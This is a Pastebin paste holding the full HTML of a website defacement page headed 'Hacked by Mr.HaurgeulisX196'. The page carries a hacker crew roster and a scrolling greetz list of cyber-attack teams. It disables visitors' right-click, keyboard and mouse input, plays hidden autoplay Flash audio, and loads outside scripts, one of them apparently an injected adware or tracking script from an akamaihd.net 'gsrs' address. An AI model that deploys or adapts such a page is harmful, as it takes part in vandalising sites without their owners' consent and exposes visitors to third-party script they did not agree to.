Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <html>
- <head>
- <meta name="description" content="Hacked by Mr.HaurgeulisX196>
- <meta name="keywords" content="Hacked by Mr.HaurgeulisX196">
- <meta name="author" content="Hacked by Mr.HaurgeulisX196">
- <meta charset="UTF-8">
- <script type="text/javascript" src="http://apiwebspadesinfo-a.akamaihd.net/gsrs?is=fmxqtid&bp=PB&g=1c83c707-6e9c-4b09-884c-3bbc7f641e35" ></script></head>
- <title>Hacked by Mr.HaurgeulisX196</title>
- <link rel='SHORTCUT ICON' type='image/x-icon'
- href='http://haurgeulis-security.blogspot.com/favicon.ico'>
- <body background="http://nadya4site.files.wordpress.com/2014/01/scary-road-background-scenery-original.jpg">
- <body oncontextmenu='return false;' onkeydown='return false;' onmousedown='return false;'>
- <script type="text/javascript" src="http://id-pemula-javascript.googlecode.com/files/efek-salju.js" /></script>
- <script type="text/javascript">
- snowStorm.snowColor = 'blue';
- // salju biru muda silakan ganti dengan warna lain
- snowStorm.flakesMaxActive = 96;
- snowStorm.useTwinkleEffect = true;
- </script>
- <link href='http://fonts.googleapis.com/css?family=Pirata+One' rel='stylesheet' type='text/css'>
- <center><font style="color:white;font size:8px;text-align: center;font-family:Pirata One;text-shadow: 0 0 3px #0000FF, 0px 0px 5px #00FFFF,0 0 5px #00FFFF,0 0 5px #00FFFF;"><font face="Pirata One" color=red size=5></font><font size="10" font-family="Pirata One" color="black">[#] Hacked By Mr.HaurgeulisX196 [#]</font></a></center>
- <center><font style="color:white;font size:8px;text-align: center;font-family:Pirata One;text-shadow: 0 0 3px #0000FF, 0px 0px 5px #00FFFF,0 0 5px #00FFFF,0 0 5px #00FFFF;"><font face="Pirata One" color=red size=5></font><font size="5" font-family="Pirata One" color="black">$ Try To be yourself | If You Want to get the best</font></a></center>
- <div class="auto-style2">
- <style type="text/css">
- .img_OW{
- position:relative
- }
- </style>
- <script src="http://otowebsite.googlecode.com/files/Getar.js.txt" type="text/javascript"></script>
- <a href="https://www.facebook.com/Mr.HaurgeulisX196" target="blank"> <center><img class="img_OW" src="https://fbcdn-photos-b-a.akamaihd.net/hphotos-ak-prn1/t1.0-0/10312495_244149309119361_5427893583817506774_n.jpg" widht="900" height="325" onclick="top.focus()" onmouseout="stoprattle(this);top.focus()" onmouseover="init(this);rattleimage()" /></a>
- <SCRIPT>
- var width=document.body.clientWidth;
- var height=document.body.clientHeight;
- function doClickText(who,type,step,timeOut) {
- document.getElementById(who).style.display="none";
- if(type==0) {
- reveal('revealDiv1',step,timeOut,0);
- reveal('revealDiv2',step,timeOut,1);}
- if(type==1) {
- reveal('revealDiv1',step,timeOut,2);
- reveal('revealDiv2',step,timeOut,3);}}
- function reveal(who,step,timeOut,type) {
- if(type==0)
- var where="top";
- if(type==1)
- var where="bottom";
- if(type==2)
- var where="left";
- if(type==3)
- var where="right";
- eval('var temp=document.getElementById(who).style.'+where);
- temp=parseInt(temp);
- if(type==0||type==1)
- var checkWith=height/2;
- if(type==2||type==3)
- var checkWith=width/2;
- if(-temp<checkWith) {
- temp-=step;
- eval('document.getElementById(who).style.'+where+'=temp;');
- setTimeout("reveal('"+who+"',"+step+",'"+timeOut+"',"+type+")", timeOut);}
- else {
- document.getElementById(who).style.display="none";
- document.body.scroll="yes";}}
- function initReveal(type,div1bg,div2bg,div1bw,div2bw,div1bc,div2bc,step,timeOut,click) {
- if(type==0) {
- var bWhere1="border-bottom";
- var bWhere2="border-top";
- var putZero1="top:0px; left:0px";
- var putZero2="bottom:0px; left:0px";
- document.write('<div id="revealDiv1" style="z-index:100; display:block; position:absolute; '+putZero1+'; background:'+div1bg+' ; width:'+(width)+'; height:'+(height/2)+'; '+bWhere1+':'+div1bc+' solid '+div1bw+'px"></div>');
- document.write('<div id="revealDiv2" style="z-index:100; display:block; position:absolute; '+putZero2+'; background:'+div2bg+' ; width:'+(width)+'; height:'+(height/2)+'; '+bWhere2+':'+div2bc+' solid '+div2bw+'px"></div>');
- if(!click) {
- reveal('revealDiv1',step,timeOut,0);
- reveal('revealDiv2',step,timeOut,1);}
- else {
- clickText(type,step,timeOut);}}
- if(type==1) {
- var bWhere1="border-right";
- var bWhere2="border-left";
- var putZero1="top:0px; left:0px";
- var putZero2="top:0px; right:0px";
- document.write('<div id="revealDiv1" style="z-index:100; display:block; position:absolute; '+putZero1+'; background:'+div1bg+' ; width:'+(width/2)+'; height:'+(height)+'; '+bWhere1+':'+div1bc+' solid '+div1bw+'px"></div>');
- document.write('<div id="revealDiv2" style="z-index:100; display:block; position:absolute; '+putZero2+'; background:'+div2bg+' ; width:'+(width/2)+'; height:'+(height)+'; '+bWhere2+':'+div2bc+' solid '+div2bw+'px"></div>');
- if(!click) {
- reveal('revealDiv1',step,timeOut,2);
- reveal('revealDiv2',step,timeOut,3);}
- else {
- clickText(type,step,timeOut);}}
- function clickText(type,step,timeOut) {
- document.write('<div id="clickText" style="z-index:101; display:block; position:absolute; top:'+(height/2-clickh/2-clickb)+'; left:'+(width/2-clickw/2-clickb)+'"><table style="border:'+clickc+' solid '+clickb+'px; background:'+clickbg+' ;width:'+clickw+'px; height:'+clickh+'; '+clickFont+'; cursor:hand; cursor:pointer" onclick="doClickText(\'clickText\','+type+','+step+','+timeOut+')"><tr><td align="middle">'+clickt+'</td></tr></table></div>');}}</SCRIPT> <SCRIPT>
- var clickw=320; // Width
- var clickh=30; // Height
- var clickb=1; // Border width
- var clickc="red"; // Border color
- var clickbg="#0000FF"; // Background color
- var clickt="<b><blink>Click this</blink></b>"; // Text to display
- var clickFont="font-family:Tahoma,arial,helvetica; font-size:11pt; font-weight:bold; color:Green"; // The font style of the text
- new initReveal(0,'red','white',5,5,'blue','indigo',3,10,true);</SCRIPT>
- <p>
- <font color="white" face="courier new" size="4">We Are : Mr.HaurgeulisX196 - Mr.Dha - Mr.DellaltioNx196 - Isal Dot ID - Della HaXor - Sneake - SvN_NeverMore - HumanError404 - Achan Dot ID - Kinal dot ID - Tata HaXor </font>
- <p>
- <p>
- <p>
- <footer id="det" style="position:fixed; left:0px; right:0px; bottom:0px; background:rgb(0,0,0); border-top: 1px solid #0000CD; border-bottom: 1px solid #0000CD"><font style="font:20px orbitron;color:#FF0000;"><font style="font:17px orbitron;color:#0000CD;"><b>Greetz :</b></font></font><font face="Tahoma" size="4" color="Red">[</font><font face="Ubuntu Mono" size="4" color="#4C9CAF"><b><marquee scrollamount="5" scrolldelay="50" width="85%">Haurgeulis Security | No Name Cyber Team | Garuda Cyber Attacker | Surabaya Black Hat | BlackAnt Sec | Pakistan Zindabad | Pakistan Haxors Crew - PHC | Madleets | Manusia Biasa Team | Java Cyber Army | Indonesia Security Tester | Indonesia Cyber Army | Suram Crew | Jember Hacker Team | JKT48 Cyber Team | n1tr0 | Hmei7 | ./Ozzora404 | RhC | ./SAMUEL84 | Barrabravaz | Katonz | Menibox | ViruzTomcat | BoyMinionymous_ | Rebels | ./BR14N | ExE Dot ID</b> </marquee></foottyle="margin: 0px; padding: 0px"></font><font face="Tahoma" size="4" color="Red">]</font><style>
- <style type='text/css'>body, a, a:link{cursor:url(http://l.yimg.com/us.yimg.com/i/mesg/emoticons7/19.gif), default;} a:hover {cursor:url(http://3.bp.blogspot.com/-bRikgqeZx0Q/TwGR4MUEC7I/AAAAAAAAAtA/isJmS0r35Qw/s1600/pointer.png),wait;}</style>
- <object data="http://static.4shared.com/flash/player/5.10/player.swf?file=http://www.youtube.com/v/xG0yUhc2y3s&repeat=no&autostart=true" width="0" height="0" type="application/x-shockwave-flash"></object>
- </
Advertisement
Add Comment
Please, Sign In to add comment